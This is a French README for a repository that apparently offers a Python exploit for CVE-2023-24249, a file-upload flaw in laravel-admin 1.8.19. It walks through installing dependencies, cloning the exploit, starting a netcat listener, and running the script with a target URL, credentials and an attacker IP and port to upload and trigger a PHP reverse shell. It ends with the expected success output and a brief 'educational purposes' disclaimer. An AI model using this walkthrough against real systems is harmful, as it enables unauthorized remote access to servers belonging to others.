
Script d'exploitation pour CVE-2023-24249 - une vulnérabilité permettant l'exécution de code à distance via le téléversement de fichiers et l'injection de commandes.
Ce dépôt contient un script d'exploit pour CVE-2023-24249, une vulnérabilité critique présente dans laravel-admin version 1.8.19. Cette vulnérabilité permet un téléchargement de fichiers arbitraires, permettant aux attaquants d'exécuter du code arbitraire via un fichier PHP spécialement conçu. L'exploit démontre comment un attaquant peut télécharger un reverse shell vers l'application cible et l'exécuter pour obtenir un accès distant.
CVE-2023-24249 est une vulnérabilité de téléchargement de fichiers arbitraires dans laravel-admin v1.8.19. Cette vulnérabilité permet aux attaquants de télécharger et d'exécuter des fichiers PHP arbitraires, conduisant à une exécution de code à distance potentielle.
Le script d'exploit fourni automatise le processus d'exploitation de CVE-2023-24249. Il effectue les étapes suivantes :
requestsbeautifulsoup4Installez les bibliothèques requises avec pip :
pip install requests beautifulsoup4
Clonez le dépôt :
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
Démarrez un listener sur votre machine :
nc -lvnp <PORT>
Exécutez le script d'exploit :
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
Remplacez <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> et <YOUR_PORT> par les valeurs appropriées :
<TARGET_URL> : l'URL de l'application cible.<USERNAME> : le nom d'utilisateur pour l'authentification.<PASSWORD> : le mot de passe pour l'authentification.python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
Si l'exploit réussit, le script affichera :
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
Ce script est destiné uniquement à des fins éducatives. Toute utilisation non autorisée de ce script contre un système sans autorisation explicite est illégale et contraire à l'éthique. L'auteur n'est pas responsable de tout usage abusif ou dommage causé par ce script.
<YOUR_IP> : votre adresse IP pour recevoir la connexion du reverse shell.<YOUR_PORT> : le port sur lequel votre listener est en écoute.